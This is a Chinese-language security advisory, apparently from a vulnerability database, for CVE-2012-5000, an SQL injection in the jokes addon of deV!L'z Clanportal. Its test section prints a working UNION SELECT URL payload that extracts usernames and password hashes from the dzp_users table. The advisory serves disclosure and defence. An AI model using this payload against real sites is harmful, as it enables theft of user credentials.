发布日期：2012-09-20
更新日期：2012-09-28

受影响系统：

deV!L'z Clanportal deV!L'z Clanportal Witze Addon

描述：

---

BUGTRAQ  ID: 52286
CVE ID: CVE-2012-5000

deV!L'z Clanportal的Witze插件是给您提供笑话的插件。

deV!L`z Clanportal的Witze插件存在安全漏洞，通过id参数传递到jokes/index.php的输入没有正确过滤即用在SQL查询中，可被利用操作SQL查询。

<*来源：Easy Laster
  
  链接：http://secunia.com/advisories/48233
        http://www.exploit-db.com/exploits/18558/
        http://www.osvdb.org/79807
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Easy Laster （）提供了如下测试方法：
[+] Vulnerability
    
   jokes/index.php?action=show&id=

   [+] Injectable
    
   jokes/index.php?action=show&id=9999999999999999999999999999+union+select+1,1,nick,pwd,1,1+from+dzp_users+where+id=1--+

建议：

---

厂商补丁：

deV!L'z Clanportal
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://dzcp-zone.de/downloads/?action=show&id=97

浏览次数：38805
严重程度：0（网友投票）